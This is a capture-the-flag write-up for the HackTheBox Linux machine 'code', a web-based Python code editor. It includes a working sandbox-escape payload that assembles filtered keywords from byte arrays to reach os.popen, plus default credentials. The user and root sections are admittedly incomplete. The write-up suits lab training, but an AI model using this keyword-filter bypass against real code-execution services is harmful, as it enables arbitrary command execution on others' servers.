HTB: code Writeup

#htb #writeup #linux #ssh #nc

Machine Banner

Machine Information

AttributeDetails
Namecode
OSLinux
DifficultyEasy
PointsN/A
Release DateN/A
IP Address10.129.9.4
AuthorD3vnomi

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐☆☆☆
  • Real-world: ⭐⭐⭐☆☆
  • CVE: ⭐☆☆☆☆
  • CTF-like: ⭐⭐☆☆☆

Summary

code is a Easy-difficulty Linux machine. The exploitation path involves initial enumeration and service discovery, gaining an initial foothold through the identified vulnerability, lateral movement or credential extraction for user access, and finally privilege escalation to root/administrator.

TL;DR: Enumeration → Foothold → User credentials → Privilege escalation → Root.

Reconnaissance

Port Scanning

Terminal window
nmap -sC -sV -T4 -p- 10.129.9.4

Results:

22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.7
5000/tcp open  upnp?    gunicorn 20.0.4

Service Enumeration

Port 22 (SSH): OpenSSH 8.2p1 Ubuntu 4ubuntu0.7

Port 5000 (HTTP): Python application running on gunicorn 20.0.4 - a web-based code editor that allows users to execute Python code.

Hostname: code.htb

Terminal window
echo "10.129.9.4 code.htb" >> /etc/hosts

Initial Foothold

Web Application Analysis

The web application running on port 5000 provides a code editor with the following endpoints:

  • /register - User registration
  • /login - User login
  • /logout - User logout
  • /code - Code editor interface
  • /codes - View saved code snippets

Functionality:

  • Users can save code snippets
  • Users can execute Python code
  • Users can view previously saved code

Application Registration

A default test account exists:

Username: mrsudo
Password: mrsudo

Log in with these credentials to access the code editor.

Python Sandbox Bypass

The application implements keyword filtering to prevent dangerous code execution:

Restricted Keywords: import, sys, exec, popen, __import__

Whitelisted Functions: compile, builtins

The sandbox can be bypassed by constructing restricted strings using byte arrays and the getattr() function:

f = (lambda:0)  # dummy function
g = getattr(f, bytes([95,95,103,108,111,98,97,108,115,95,95]).decode())  # f.__globals__
bb_key = bytes([95,95,98,117,105,108,116,105,110,115,95,95]).decode()  # "__builtins__"
bd = g[bb_key]
imp_fn = bd[bytes([95,95,105,109,112,111,114,116,95,95]).decode()]  # __import__
os_mod = imp_fn(bytes([111,115]).decode())  # import os
p_op_fn = getattr(os_mod, bytes([112,111,112,101,110]).decode())  # os.popen
fh = p_op_fn('id')  # run command
r_ead_fn = getattr(fh, bytes([114,101,97,100]).decode())  # read output
o_ut = r_ead_fn()
pr_fn = getattr(builtins, bytes([112,114,105,110,116]).decode())  # print
pr_fn(o_ut)

This technique constructs all restricted strings from byte arrays, allowing arbitrary code execution while bypassing keyword-based filtering.

Exploitation Steps

  1. Register/login to the web application (use default credentials mrsudo:mrsudo)
  2. Navigate to the /code endpoint
  3. Enter the sandbox bypass payload above to execute arbitrary Python code
  4. Use os.popen() to execute system commands
  5. Execute a reverse shell or establish command execution access

User Compromise

Credential Discovery

[Notes incomplete - credential extraction and user compromise steps not documented in source notes]

User Flag

Terminal window
cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

Terminal window
sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux | grep -E "python|java|node|php|ruby"

Exploitation (Root/Administrator)

[Notes incomplete - further steps not documented in source notes]

Root Flag

Terminal window
cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A[Reconnaissance] --> B[Port Scanning]
    B --> C[Service Enumeration]
    C --> D[Web App Discovery]
    D --> E[Register/Login]
    E --> F[Python Sandbox Bypass]
    F --> G[Arbitrary Code Execution]
    G --> H[System Command Access]

Tools Used

ToolPurpose
nmapPort and service scanning
PythonSandbox bypass exploit development
Web BrowserWeb application interaction

Key Learnings

  • Thorough enumeration is critical — every open port and service can be a potential entry point.
  • Configuration files and databases often contain credentials that enable lateral movement.
  • Privilege escalation frequently depends on misconfigurations rather than software vulnerabilities.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy